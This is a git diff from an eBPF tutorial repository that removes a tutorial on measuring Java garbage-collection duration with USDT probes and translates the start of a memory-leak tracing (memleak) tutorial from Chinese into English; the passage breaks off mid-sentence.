/dev/null @@ -1,319 +0,0 @@ -# eBPF Tutorial by Example 15: Capturing User-Space Java GC Duration Using USDT - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without the need to restart the kernel or modify the kernel source code. This feature provides eBPF with high flexibility and performance, making it widely applicable in network and system performance analysis. Furthermore, eBPF also supports capturing user-space application behavior using User-Level Statically Defined Tracing (USDT). - -In this article of our eBPF Tutorial by Example series, we will explore how to use eBPF and USDT to capture and analyze the duration of Java garbage collection (GC) events. - -## Introduction to USDT - -USDT is a mechanism for inserting static tracepoints into applications, allowing developers to insert probes at critical points in the program for debugging and performance analysis purposes. These probes can be dynamically activated at runtime by tools such as DTrace, SystemTap, or eBPF, allowing access to the program's internal state and performance metrics without the need to restart the application or modify the program code. USDT is widely used in many open-source software applications such as MySQL, PostgreSQL, Ruby, Python, and Node.js. - -### User-Level Tracing Mechanism: User-Level Dynamic Tracing and USDT - -User-Level Dynamic Tracing allows us to instrument any user-level code by placing probes. For example, we can trace query requests in a MySQL server by placing a probe on the `dispatch_command()` function: - -```bash -# ./uprobe 'p:cmd /opt/bin/mysqld:_Z16dispatch_command19enum_server_commandP3THDPcj +0(%dx):string' -Tracing uprobe cmd (p:cmd /opt/bin/mysqld:0x2dbd40 +0(%dx):string). Ctrl-C to end. - mysqld-2855 [001] d... 19957757.590926: cmd: (0x6dbd40) arg1="show tables" - mysqld-2855 [001] d... 19957759.703497: cmd: (0x6dbd40) arg1="SELECT * FROM numbers" -[...] -``` - -Here, we use the `uprobe` tool, which leverages Linux's built-in functionalities: ftrace (tracing framework) and uprobes (User-Level Dynamic Tracing, requires a relatively new Linux version, around 4.0 or later). Other tracing frameworks such as perf_events and SystemTap can also achieve this functionality. - -Many other MySQL functions can be traced to obtain more information. We can list and count the number of these functions: - -```bash -# ./uprobe -l /opt/bin/mysqld | more -account_hash_get_key -add_collation -add_compiled_collation -add_plugin_noargs -adjust_time_range -[...] -# ./uprobe -l /opt/bin/mysqld | wc -l -21809 -``` - -There are 21,000 functions here. We can also trace library functions or even individual instruction offsets. - -User-Level Dynamic Tracing capability is very powerful and can solve numerous problems. However, using it also has some challenges: identifying the code to trace, handling function parameters, and dealing with code modifications. - -User-Level Statically Defined Tracing (USDT) can address some of these challenges. USDT probes (or "markers" at the user level) are trace macros inserted at critical positions in the code, providing a stable and well-documented API. This makes the tracing work simpler. - -With USDT, we can easily trace a probe called `mysql:query__start` instead of tracing the C++ symbol `_Z16dispatch_command19enum_server_commandP3THDPcj`, which is the `dispatch_command()` function. Of course, we can still trace `dispatch_command()` and the other 21,000 mysqld functions when needed, but only when USDT probes cannot solve the problem.In Linux, USDT (User Statically Defined Tracing) has actually existed in various forms for decades. It has recently gained attention again due to the popularity of Sun's DTrace tool, which has led to many common applications, including MySQL, PostgreSQL, Node.js, Java, etc., adding USDT support. SystemTap has developed a way to consume these DTrace probes. - -You may be running a Linux application that already includes USDT probes, or you may need to recompile it (usually with --enable-dtrace). You can use `readelf` to check, for example, for Node.js: - -```bash -# readelf -n node -[...] -Notes at offset 0x00c43058 with length 0x00000494: - Owner Data size Description - stapsdt 0x0000003c NT_STAPSDT (SystemTap probe descriptors) - Provider: node - Name: gc__start - Location: 0x0000000000bf44b4, Base: 0x0000000000f22464, Semaphore: 0x0000000001243028 - Arguments: 4@%esi 4@%edx 8@%rdi -[...] - stapsdt 0x00000082 NT_STAPSDT (SystemTap probe descriptors) - Provider: node - Name: http__client__request - Location: 0x0000000000bf48ff, Base: 0x0000000000f22464, Semaphore: 0x0000000001243024 - Arguments: 8@%rax 8@%rdx 8@-136(%rbp) -4@-140(%rbp) 8@-72(%rbp) 8@-80(%rbp) -4@-144(%rbp) -[...] -``` - -This is a Node.js recompiled with --enable-dtrace and installed with the systemtap-sdt-dev package that provides "dtrace" functionality to support USDT. Here are two probes displayed: node:gc__start (garbage collection start) and node:http__client__request. - -At this point, you can use SystemTap or LTTng to trace these probes. However, built-in Linux tracers like ftrace and perf_events currently cannot do this (although perf_events support is under development). - -## Introduction to Java GC - -Java, as a high-level programming language, has automatic garbage collection (GC) as one of its core features. The goal of Java GC is to automatically reclaim memory space that is no longer used by the program, thereby relieving programmers of the burden of memory management. However, the GC process may cause application pauses, which can impact program performance and response time. Therefore, monitoring and analyzing Java GC events are essential for understanding and optimizing the performance of Java applications. - -In the following tutorial, we will demonstrate how to use eBPF and USDT to monitor and analyze the duration of Java GC events. We hope this content will be helpful to you in your work with eBPF for application performance analysis. - -USDT in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs by 10 times. - -## eBPF Implementation Mechanism - -The eBPF program for Java GC is divided into two parts: kernel space and user space. We will introduce the implementation mechanisms of these two parts separately. - -### Kernel Space Program - -```c -/* SPDX-License-Identifier: (LGPL-2.1 OR BSD-2-Clause) */ -/* Copyright (c) 2022 Chen Tao */ -#include -#include -#include -#include -#include "javagc.h" - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, 100); - __type(key, uint32_t); - __type(value, struct data_t); -} data_map SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_PERF_EVENT_ARRAY) - __type(key, int); - __type(value, int); -} perf_map SEC(".maps"); - -__u32 time; - -static int gc_start(struct pt_regs *ctx) -{ - struct data_t data = {}; - - data.cpu = bpf_get_smp_processor_id(); - data.pid = bpf_get_current_pid_tgid() >> 32; - data.ts = bpf_ktime_get_ns(); - bpf_map_update_elem(&data_map, &data.pid, &data, 0); - return 0; -} - -static int gc_end(struct pt_regs *ctx) -{ - struct data_t data = {}; - struct data_t *p; - __u32 val; - - data.cpu = bpf_get_smp_processor_id(); - data.pid = bpf_get_current_pid_tgid() >> 32; - data.ts = bpf_ktime_get_ns(); - p = bpf_map_lookup_elem(&data_map, &data.pid); - if (!p) - return 0; - - val = data.ts - p->ts; - if (val > time) { - data.ts = val; - bpf_perf_event_output(ctx, &perf_map, BPF_F_CURRENT_CPU, &data, sizeof(data)); - } - bpf_map_delete_elem(&data_map, &data.pid); - return 0; -} - -SEC("usdt") -int handle_gc_start(struct pt_regs *ctx) -{ - return gc_start(ctx); -} - -SEC("usdt") -int handle_gc_end(struct pt_regs *ctx) -{ - return gc_end(ctx); -} - -SEC("usdt") -int handle_mem_pool_gc_start(struct pt_regs *ctx) -{ - return gc_start(ctx); -} - -SEC("usdt") -int handle_mem_pool_gc_end(struct pt_regs *ctx) -{ - return gc_end(ctx); -} - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; -``` - -First, we define two maps: - -- `data_map`: This hashmap stores the start time of garbage collection for each process ID. The `data_t` structure contains the process ID, CPU ID, and timestamp. -- `perf_map`: This is a perf event array used to send data back to the user-space program. - -Then, we have four handler functions: `gc_start`, `gc_end`, and two USDT handler functions `handle_mem_pool_gc_start` and `handle_mem_pool_gc_end`. These functions are all annotated with the BPF `SEC("usdt")` macro to capture USDT events related to garbage collection in a Java process. - -The `gc_start` function is called when garbage collection starts. It first gets the current CPU ID, process ID, and timestamp, and then stores this data in `data_map`. - -The `gc_end` function is called when garbage collection ends. It performs similar operations as `gc_start`, but it also retrieves the start time from `data_map` and calculates the duration of garbage collection. If the duration exceeds a set threshold (`time` variable), it sends the data back to the user-space program. - -`handle_gc_start` and `handle_gc_end` are handler functions for the garbage collection start and end events, respectively, and they call `gc_start` and `gc_end`, respectively. - -`handle_mem_pool_gc_start` and `handle_mem_pool_gc_end` are handler functions for the garbage collection start and end events in the memory pool, and they also call `gc_start` and `gc_end`, respectively.Finally, we have a `LICENSE` array that declares the license of the BPF program, which is required for loading the BPF program. - -### User-space Program - -The main goal of the user-space program is to load and run eBPF programs, as well as process data from the kernel-space program. This is achieved through the use of the libbpf library. Here, we are omitting some common code for loading and running eBPF programs and only showing the parts related to USDT. - -The first function `get_jvmso_path` is used to obtain the path of the `libjvm.so` library for the running Java Virtual Machine (JVM). First, it opens the `/proc//maps` file, which contains the memory mapping information of the process address space. Then, it searches for the line that contains `libjvm.so` in the file and copies the path of that line to the provided argument. - -```c -static int get_jvmso_path(char *path) -{ - char mode[16], line[128], buf[64]; - size_t seg_start, seg_end, seg_off; - FILE *f; - int i = 0; - - sprintf(buf, "/proc/%d/maps", env.pid); - f = fopen(buf, "r"); - if (!f) - return -1; - - while (fscanf(f, "%zx-%zx %s %zx %*s %*d%[^\n]\n", - &seg_start, &seg_end, mode, &seg_off, line) == 5) { - i = 0; - while (isblank(line[i])) - i++; - if (strstr(line + i, "libjvm.so")) { - break; - } - } - - strcpy(path, line + i); - fclose(f); - - return 0; -} -``` - -Next, we see the attachment of the eBPF programs (`handle_gc_start` and `handle_gc_end`) to the relevant USDT probes in the Java process. Each program achieves this by calling the `bpf_program__attach_usdt` function, which takes as parameters the BPF program, the process ID, the binary path, and the provider and name of the probe. If the probe is successfully attached, `bpf_program__attach_usdt` will return a link object, which is stored in the skeleton's link member. If the attachment fails, the program will print an error message and perform cleanup. - -```c - skel->links.handle_mem_pool_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, - binary_path, "hotspot", "mem__pool__gc__begin", NULL); - if (!skel->links.handle_mem_pool_gc_start) { - err = errno; - fprintf(stderr, "attach usdt mem__pool__gc__begin failed: %s\n", strerror(err)); - goto cleanup; - } - - skel->links.handle_mem_pool_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, - binary_path, "hotspot", "mem__pool__gc__end", NULL); - if (!skel->links.handle_mem_pool_gc_end) { - err = errno; - fprintf(stderr, "attach usdt mem__pool__gc__end failed: %s\n", strerror(err)); - goto cleanup; - } - - skel->links.handle_gc_start = bpf_program__attach_usdt(skel->progs.handle_gc_start, env.pid, -binary_path, "hotspot", "gc__begin", NULL); - if (!skel->links.handle_gc_start) { - err = errno; - fprintf(stderr, "attach usdt gc__begin failed: %s\n", strerror(err)); - goto cleanup; - } - - skel->links.handle_gc_end = bpf_program__attach_usdt(skel->progs.handle_gc_end, env.pid, - binary_path, "hotspot", "gc__end", NULL); - if (!skel->links.handle_gc_end) { - err = errno; - fprintf(stderr, "attach usdt gc__end failed: %s\n", strerror(err)); - goto cleanup; - } -``` - -The last function `handle_event` is a callback function used to handle data received from the perf event array. This function is triggered by the perf event array and is called each time a new event is received. The function first converts the data to a `data_t` structure, then formats the current time as a string, and finally prints the timestamp, CPU ID, process ID, and duration of the garbage collection. - -```c -static void handle_event(void *ctx, int cpu, void *data, __u32 data_sz) -{ - struct data_t *e = (struct data_t *)data; - struct tm *tm = NULL; - char ts[16]; - time_t t; - - time(&t); - tm = localtime(&t); - strftime(ts, sizeof(ts), "%H:%M:%S", tm); - printf("%-8s %-7d %-7d %-7lld\n", ts, e->cpu, e->pid, e->ts/1000); -} -``` - -## Installing Dependencies - -To build the example, you need clang, libelf, and zlib. The package names may vary with different distributions. - -On Ubuntu/Debian, run the following command: - -```shell -sudo apt install clang libelf1 libelf-dev zlib1g-dev -``` - -On CentOS/Fedora, run the following command: - -```shell -sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel -``` - -## Compiling and Running - -In the corresponding directory, run Make to compile and run the code: - -```console -$ make -$ sudo ./javagc -p 12345 -Tracing javagc time... Hit Ctrl-C to end. -TIME CPU PID GC TIME -10:00:01 10% 12345 50ms -10:00:02 12% 12345 55ms -10:00:03 9% 12345 47ms -10:00:04 13% 12345 52ms -10:00:05 11% 12345 50ms -``` - -Complete source code: - -- - -References: - -- -- - -Summary.Through this introductory eBPF tutorial, we have learned how to use eBPF and USDT for dynamic tracing and analysis of Java garbage collection (GC) events. We have understood how to set USDT tracepoints in user space applications and how to write eBPF programs to capture information from these tracepoints, thereby gaining a deeper understanding and optimizing the behavior and performance of Java GC. - -Additionally, we have also introduced some basic knowledge and practical techniques related to Java GC, USDT, and eBPF. This knowledge and skills are valuable for developers who want to delve into the field of network and system performance analysis. - -If you would like to learn more about eBPF knowledge and practices, you can visit our tutorial code repository at or website to get more examples and the complete tutorial. diff --git a/src/16-memleak/README.md b/src/16-memleak/README.md index 0dfb2f4..03d3494 100644 --- a/src/16-memleak/README.md +++ b/src/16-memleak/README.md @@ -1,26 +1,24 @@ -# eBPF 入门实践教程十六:编写 eBPF 程序 Memleak 监控内存泄漏 +# eBPF Tutorial by Example 16: Monitoring Memory Leaks -eBPF(扩展的伯克利数据包过滤器)是一项强大的网络和性能分析工具,被广泛应用在 Linux 内核上。eBPF 使得开发者能够动态地加载、更新和运行用户定义的代码,而无需重启内核或更改内核源代码。 +eBPF (extended Berkeley Packet Filter) is a powerful network and performance analysis tool that is widely used in the Linux kernel. eBPF allows developers to dynamically load, update, and run user-defined code without restarting the kernel or modifying its source code. -在本篇教程中,我们将探讨如何使用 eBPF 编写 Memleak 程序,以监控程序的内存泄漏。 +In this tutorial, we will explore how to write a Memleak program using eBPF to monitor memory leaks in programs. -## 背景及其重要性 +## Background and Importance -内存泄漏是计算机编程中的一种常见问题,其严重程度不应被低估。内存泄漏发生时,程序会逐渐消耗更多的内存资源,但并未正确释放。随着时间的推移,这种行为会导致系统内存逐渐耗尽,从而显著降低程序及系统的整体性能。 +Memory leaks are a common problem in computer programming and should not be underestimated. When memory leaks occur, programs gradually consume more memory resources without properly releasing them. Over time, this behavior can lead to a gradual depletion of system memory, significantly reducing the overall performance of the program and system. -内存泄漏有多种可能的原因。这可能是由于配置错误导致的,例如程序错误地配置了某些资源的动态分配。它也可能是由于软件缺陷或错误的内存管理策略导致的,如在程序执行过程中忘记释放不再需要的内存。此外,如果一个应用程序的内存使用量过大,那么系统性能可能会因页面交换(swapping)而大幅下降,甚至可能导致应用程序被系统强制终止(Linux 的 OOM killer)。 +There are many possible causes of memory leaks. It may be due to misconfiguration, such as a program incorrectly configuring dynamic allocation of certain resources. It may also be due to software bugs or incorrect memory management strategies, such as forgetting to release memory that is no longer needed during program execution. Additionally, if an application's memory usage is too high, system performance may significantly decrease due to paging/swapping, or it may even cause the application to be forcibly terminated by the system's OOM killer (Out of Memory Killer). -### 调试内存泄漏的挑战 +### Challenges of Debugging Memory Leaks -调试内存泄漏问题是一项复杂且挑战性的任务。这涉及到详细检查应用程序的配置、内存分配和释放情况,通常需要应用专门的工具来帮助诊断。例如,有一些工具可以在应用程序启动时将 malloc() 函数调用与特定的检测工具关联起来,如 Valgrind memcheck,这类工具可以模拟 CPU 来检查所有内存访问,但可能会导致应用程序运行速度大大减慢。另一个选择是使用堆分析器,如 libtcmalloc,它相对较快,但仍可能使应用程序运行速度降低五倍以上。此外,还有一些工具,如 gdb,可以获取应用程序的核心转储并进行后处理以分析内存使用情况。然而,这些工具通常在获取核心转储时需要暂停应用程序,或在应用程序终止后才能调用 free() 函数。 +Debugging memory leak issues is a complex and challenging task. This involves detailed examination of the program's configuration, memory allocation, and deallocation, often requiring specialized tools to aid in diagnosis. For example, there are tools that can associate malloc() function calls with specific detection tools, such as Valgrind memcheck, which can simulate the CPU to check all memory accesses, but may greatly slow down the application's execution speed. Another option is to use heap analyzers, such as libtcmalloc, which are relatively faster but may still decrease the application's execution speed by more than five times. Additionally, there are tools like gdb that can obtain core dumps of applications and perform post-processing analysis of memory usage. However, these tools often require pausing the application during core dump acquisition or calling the free() function after the application terminates. -## eBPF 的作用 +## Role of eBPF -在这种背景下,eBPF 的作用就显得尤为重要。eBPF 提供了一种高效的机制来监控和追踪系统级别的事件,包括内存的分配和释放。通过 eBPF,我们可以跟踪内存分配和释放的请求,并收集每次分配的调用堆栈。然后,我们可以分 +In this context, the role of eBPF becomes particularly important. eBPF provides an efficient mechanism for monitoring and tracking system-level events, including memory allocation and deallocation. With eBPF, we can trace memory allocation and deallocation requests and collect the call stacks for each allocation. We can then analyze this information to identify call stacks that perform memory allocations but do not perform subsequent deallocations, helping us identify the source of memory leaks. The advantage of this approach is that it can be done in real-time within a running application without pausing the application or performing complex post-processing. -析这些信息,找出执行了内存分配但未执行释放操作的调用堆栈,这有助于我们找出导致内存泄漏的源头。这种方式的优点在于,它可以实时地在运行的应用程序中进行,而无需暂停应用程序或进行复杂的前后处理。 - -`memleak` eBPF 工具可以跟踪并匹配内存分配和释放的请求,并收集每次分配的调用堆栈。随后,`memleak` 可以打印一个总结,表明哪些调用堆栈执行了分配,但是并没有随后进行释放。例如,我们运行命令: +The `memleak` eBPF tool can trace and match memory allocation and deallocation requests, and collect the call stacks for each allocation. Subsequently, `memleak` can print a summary indicating which call stacks executed allocations but did not perform subsequent deallocations. For example, running the command: ```console # ./memleak -p $(pidof allocs) @@ -36,23 +34,23 @@ Attaching to pid 5193, Ctrl+C to quit. __libc_start_main+0xf0 [libc-2.21.so] ``` -运行这个命令后,我们可以看到分配但未释放的内存来自于哪些堆栈,并且可以看到这些未释放的内存的大小和数量。 +After running this command, we can see which stacks the allocated but not deallocated memory came from, as well as the size and quantity of these unreleased memory blocks. -随着时间的推移,很显然,`allocs` 进程的 `main` 函数正在泄漏内存,每次泄漏 16 字节。幸运的是,我们不需要检查每个分配,我们得到了一个很好的总结,告诉我们哪个堆栈负责大量的泄漏。 +Over time, it becomes evident that the `main` function of the `allocs` process is leaking memory, 16 bytes at a time. Fortunately, we don't need to inspect each allocation; we have a nice summary that tells us which stack is responsible for the significant leaks. -## memleak 的实现原理 +## Implementation Principle of memleak -在基本层面上,`memleak` 的工作方式类似于在内存分配和释放路径上安装监控设备。它通过在内存分配和释放函数中插入 eBPF 程序来达到这个目标。这意味着,当这些函数被调用时,`memleak` 就会记录一些重要信息,如调用者的进程 ID(PID)、分配的内存地址以及分配的内存大小等。当释放内存的函数被调用时,`memleak` 则会在其内部的映射表(map)中删除相应的内存分配记录。这种机制使得 `memleak` 能够准确地追踪到哪些内存块已被分配但未被释放。 +At a basic level, `memleak` operates by installing monitoring devices on the memory allocation and deallocation paths. It achieves this by inserting eBPF programs into memory allocation and deallocation functions. This means that when these functions are called, `memleak` will record important information, such as the caller's process ID (PID), the allocated memory address, and the size of the allocated memory. When the function for freeing memory is called, `memleak` will delete the corresponding memory allocation record in its internal map. This mechanism allows `memleak` to accurately trace which memory blocks have been allocated but not deallocated.For commonly used memory allocation functions in user space, such as `malloc` and `calloc`, `memleak` uses user space probing (uprobe) technology for monitoring. Uprobe is a dynamic tracing technology for user space applications, which can set breakpoints at any location at runtime without modifying the binary files, thus achieving tracing of specific function calls. -对于用户态的常用内存分配函数,如 `malloc` 和 `calloc` 等,`memleak` 利用了用户态探测(uprobe)技术来实现监控。uprobe 是一种用于用户空间应用程序的动态追踪技术,它可以在运行时不修改二进制文件的情况下在任意位置设置断点,从而实现对特定函数调用的追踪。Uprobe 在内核态 eBPF 运行时,也可能产生比较大的性能开销,这时候也可以考虑使用用户态 eBPF 运行时,例如 [bpftime](https://github.com/eunomia-bpf/bpftime)。bpftime 是一个基于 LLVM JIT/AOT 的用户态 eBPF 运行时,它可以在用户态运行 eBPF 程序,和内核态的 eBPF 兼容,避免了内核态和用户态之间的上下文切换,从而提高了 eBPF 程序的执行效率。对于 uprobe 而言,bpftime 的性能开销比 kernel 小一个数量级。 +Uprobe in kernel mode eBPF runtime may also cause relatively large performance overhead. In this case, you can also consider using user mode eBPF runtime, such as [bpftime](https://github.com/eunomia-bpf/bpftime). bpftime is a user mode eBPF runtime based on LLVM JIT/AOT. It can run eBPF programs in user mode and is compatible with kernel mode eBPF, avoiding context switching between kernel mode and user mode, thereby improving the execution efficiency of eBPF programs by 10 times. -对于内核态的内存分配函数,如 `kmalloc` 等,`memleak` 则选择使用了 tracepoint 来实现监控。Tracepoint 是一种在 Linux 内核中提供的动态追踪技术,它可以在内核运行时动态地追踪特定的事件,而无需重新编译内核或加载内核模块。 +For kernel space memory allocation functions, such as `kmalloc`, `memleak` chooses to use tracepoints for monitoring. Tracepoint is a dynamic tracing technology provided in the Linux kernel, which can dynamically trace specific events in the kernel at runtime without recompiling the kernel or loading kernel modules. -## 内核态 eBPF 程序实现 +## Kernel Space eBPF Program Implementation -## `memleak` 内核态 eBPF 程序实现 +## `memleak` Kernel Space eBPF Program Implementation -`memleak` 的内核态 eBPF 程序包含一些用于跟踪内存分配和释放的关键函数。在我们深入了解这些函数之前,让我们首先观察 `memleak` 所定义的一些数据结构,这些结构在其内核态和用户态程序中均有使用。 +The kernel space eBPF program of `memleak` contains some key functions for tracking memory allocation and deallocation. Before delving into these functions, let's first take a look at some data structures defined by `memleak`, which are used in both its kernel space and user space programs. ```c #ifndef __MEMLEAK_H @@ -62,29 +60,29 @@ Attaching to pid 5193, Ctrl+C to quit. #define COMBINED_ALLOCS_MAX_ENTRIES 10240 struct alloc_info { - __u64 size; // 分配的内存大小 - __u64 timestamp_ns; // 分配时的时间戳,单位为纳秒 - int stack_id; // 分配时的调用堆栈ID + __u64 size; // Size of allocated memory + __u64 timestamp_ns; // Timestamp when allocation occurs, in nanoseconds + int stack_id; // Call stack ID when allocation occurs }; union combined_alloc_info { struct { - __u64 total_size : 40; // 所有未释放分配的总大小 - __u64 number_of_allocs : 24; // 所有未释放分配的总次数 + __u64 total_size : 40; // Total size of all unreleased allocations + __u64 number_of_allocs : 24; // Total number of unreleased allocations }; - __u64 bits; // 结构的位图表示 + __u64 bits; // Bitwise representation of the structure }; #endif /* __MEMLEAK_H */ ``` -这里定义了两个主要的数据结构:`alloc_info` 和 `combined_alloc_info`。 +Here, two main data structures are defined: `alloc_info` and `combined_alloc_info`. -`alloc_info` 结构体包含了一个内存分配的基本信息,包括分配的内存大小 `size`、分配发生时的时间戳 `timestamp_ns`,以及触发分配的调用堆栈 ID `stack_id`。 +The `alloc_info` structure contains basic information about a memory allocation, including the allocated memory size `size`, the timestamp `timestamp_ns` when the allocation occurs, and the call stack ID `stack_id` that triggers the allocation. -`combined_alloc_info` 是一个联合体(union),它包含一个嵌入的结构体和一个 `__u64` 类型的位图表示 `bits`。嵌入的结构体有两个成员:`total_size` 和 `number_of_allocs`,分别代表所有未释放分配的总大小和总次数。其中 40 和 24 分别表示 total_size 和 number_of_allocs这两个成员变量所占用的位数,用来限制其大小。通过这样的位数限制,可以节省combined_alloc_info结构的存储空间。同时,由于total_size和number_of_allocs在存储时是共用一个unsigned long long类型的变量bits,因此可以通过在成员变量bits上进行位运算来访问和修改total_size和number_of_allocs,从而避免了在程序中定义额外的变量和函数的复杂性。 +The `combined_alloc_info` is a union that contains an embedded structure and a `__u64` type bitwise representation `bits`. The embedded structure has two members: `total_size` and `number_of_allocs`, representing the total size and total count of unreleased allocations, respectively. The numbers 40 and 24 indicate the number of bits occupied by the `total_size` and `number_of_allocs` members, limiting their size. By using this limitation, storage space for the `combined_alloc_info` structure can be saved. Moreover, since `total_size` and `number_of_allocs` share the same `unsigned long long` type variable `bits` for storage, bitwise operations on the member variable `bits` can be used to access and modify `total_size` and `number_of_allocs`, avoiding the complexity of defining additional variables and functions in the program. -接下来,`memleak` 定义了一系列用于保存内存分配信息和分析结果的 eBPF 映射(maps)。这些映射都以 `SEC(".maps")` 的形式定义,表示它们属于 eBPF 程序的映射部分。 +Next, `memleak` defines a series of eBPF maps for storing memory allocation information and analysis results. These maps are defined in the form of `SEC(".maps")`, indicating that they belong to the mapping section of the eBPF program. ```c const volatile size_t min_size = 0; @@ -103,7 +101,7 @@ struct { } sizes SEC(".maps"); struct { - __uint(type, BPF_MAP_TYPE_HASH); + //... (continued)__uint(type, BPF_MAP_TYPE_HASH); __type(key, u64); /* address */ __type(value, struct alloc_info); __uint(max_entries, ALLOCS_MAX_ENTRIES); @@ -131,52 +129,52 @@ struct { static union combined_alloc_info initial_cinfo; ``` -这段代码首先定义了一些可配置的参数,如 `min_size`, `max_size`, `page_size`, `sample_rate`, `trace_all`, `stack_flags` 和 `wa_missing_free`,分别表示最小分配大小、最大分配大小、页面大小、采样率、是否追踪所有分配、堆栈标志和是否工作在缺失释放(missing free)模式。 +The code first defines some configurable parameters, such as `min_size`, `max_size`, `page_size`, `sample_rate`, `trace_all`, `stack_flags`, and `wa_missing_free`, representing the minimum allocation size, maximum allocation size, page size, sample rate, whether to trace all allocations, stack flags, and whether to work in missing free mode. -接着定义了五个映射: +Then, five maps are defined: -1. `sizes`:这是一个哈希类型的映射,键为进程 ID,值为 `u64` 类型,存储每个进程的分配大小。 -2. `allocs`:这也是一个哈希类型的映射,键为分配的地址,值为 `alloc_info` 结构体,存储每个内存分配的详细信息。 -3. `combined_allocs`:这是另一个哈希类型的映射,键为堆栈 ID,值为 `combined_alloc_info` 联合体,存储所有未释放分配的总大小和总次数。 -4. `memptrs`:这也是一个哈希类型的映射,键和值都为 `u64` 类型,用于在用户空间和内核空间之间传递内存指针。 -5. `stack_traces`:这是一个堆栈追踪类型的映射,键为 `u32` 类型,用于存储堆栈 ID。 +1. `sizes`: This is a hash-type map with the key as the process ID and the value as `u64` type, storing the allocation size of each process. +2. `allocs`: This is also a hash-type map with the key as the allocation address and the value as the `alloc_info` structure, storing detailed information about each memory allocation. +3. `combined_allocs`: This is another hash-type map with the key as the stack ID and the value as the `combined_alloc_info` union, storing the total size and count of all unreleased allocations. +4. `memptrs`: This is also a hash-type map with both the key and value as `u64` type, used to pass memory pointers between user space and kernel space. +5. `stack_traces`: This is a stack trace-type map with the key as `u32` type, used to store stack IDs. -以用户态的内存分配追踪部分为例,主要是挂钩内存相关的函数调用,如 `malloc`, `free`, `calloc`, `realloc`, `mmap` 和 `munmap`,以便在调用这些函数时进行数据记录。在用户态,`memleak` 主要使用了 uprobes 技术进行挂载。 +Taking the user-space memory allocation tracing as an example, it mainly hooks memory-related function calls such as `malloc`, `free`, `calloc`, `realloc`, `mmap`, and `munmap` to record data when these functions are called. In user space, `memleak` mainly uses uprobes technology for hooking. -每个函数调用被分为 "enter" 和 "exit" 两部分。"enter" 部分记录的是函数调用的参数,如分配的大小或者释放的地址。"exit" 部分则主要用于获取函数的返回值,如分配得到的内存地址。 +Each function call is divided into "enter" and "exit" parts. The "enter" part records the function call parameters, such as the size of the allocation or the address being freed. The "exit" part is mainly used to obtain the return value of the function, such as the memory address obtained from the allocation. -这里,`gen_alloc_enter`, `gen_alloc_exit`, `gen_free_enter` 是实现记录行为的函数,他们分别用于记录分配开始、分配结束和释放开始的相关信息。 +Here, `gen_alloc_enter`, `gen_alloc_exit`, `gen_free_enter` are functions that implement the recording behavior, and they are used to record relevant information when allocation starts, allocation ends, and freeing starts, respectively. -函数原型示例如下: +The function prototype is as follows: ```c SEC("uprobe") int BPF_KPROBE(malloc_enter, size_t size) { - // 记录分配开始的相关信息 + // Record relevant information when allocation starts return gen_alloc_enter(size); } SEC("uretprobe") int BPF_KRETPROBE(malloc_exit) { - // 记录分配结束的相关信息 + // Record relevant information when allocation ends return gen_alloc_exit(ctx); } SEC("uprobe") int BPF_KPROBE(free_enter, void *address) { - // 记录释放开始的相关信息 + // Record relevant information when freeing starts return gen_free_enter(address); } ``` -其中,`malloc_enter` 和 `free_enter` 是分别挂载在 `malloc` 和 `free` 函数入口处的探针(probes),用于在函数调用时进行数据记录。而 `malloc_exit` 则是挂载在 `malloc` 函数的返回处的探针,用于记录函数的返回值。 +`malloc_enter` and `free_enter` are probes mounted at the entry points of the `malloc` and `free` functions, respectively, to record data during function calls. `malloc_exit` is a probe mounted at the return point of the `malloc` function to record the return value of the function. -这些函数使用了 `BPF_KPROBE` 和 `BPF_KRETPROBE` 这两个宏来声明,这两个宏分别用于声明 kprobe(内核探针)和 kretprobe(内核返回探针)。具体来说,kprobe 用于在函数调用时触发,而 kretprobe 则是在函数返回时触发。 +These functions are declared using the `BPF_KPROBE` and `BPF_KRETPROBE` macros, which are used to declare kprobes (kernel probes) and kretprobes (kernel return probes), respectively. Specifically, kprobe is triggered during function calls, while kretprobe is triggered during function returns. -`gen_alloc_enter` 函数是在内存分配请求的开始时被调用的。这个函数主要负责在调用分配内存的函数时收集一些基本的信息。下面我们将深入探讨这个函数的实现。 +The `gen_alloc_enter` function is called at the beginning of a memory allocation request. This function is mainly responsible for collecting some basic information when the function that allocates memory is called. Now, let's take a deep dive into the implementation of this function. ```c static int gen_alloc_enter(size_t size) @@ -205,20 +203,18 @@ int BPF_KPROBE(malloc_enter, size_t size) } ``` -首先,`gen_alloc_enter` 函数接收一个 `size` 参数,这个参数表示请求分配的内存的大小。如果这个值不在 `min_size` 和 `max_size` 之间,函数将直接返回,不再进行后续的操作。这样可以使工具专注于追踪特定范围的内存分配请求,过滤掉不感兴趣的分配请求。 +First, the `gen_alloc_enter` function takes a `size` parameter that represents the size of the requested memory allocation. If this value is not between `min_size` and `max_size`, the function will return directly without performing any further operations. This allows the tool to focus on tracing memory allocation requests within a specific range and filter out uninteresting allocation requests. -接下来,函数检查采样率 `sample_rate`。如果 `sample_rate` 大于1,意味着我们不需要追踪所有的内存分配请求,而是周期性地追踪。这里使用 `bpf_ktime_get_ns` 获取当前的时间戳,然后通过取模运算来决定是否需要追踪当前的内存分配请求。这是一种常见的采样技术,用于降低性能开销,同时还能够提供一个代表性的样本用于分析。 +Next, the function checks the sampling rate `sample_rate`. If `sample_rate` is greater than 1, it means that we don't need to trace all memory allocation requests, but rather trace them periodically. Here, `bpf_ktime_get_ns` is used to get the current timestamp, and the modulus operation is used to determine whether to trace the current memory allocation request. This is a common sampling technique used to reduce performance overhead while providing a representative sample for analysis. -之后,函数使用 `bpf_get_current_pid_tgid` 函数获取当前进程的 PID。注意这里的 PID 实际上是进程和线程的组合 ID,我们通过右移 32 位来获取真正的进程 ID。 +Then, the function uses the 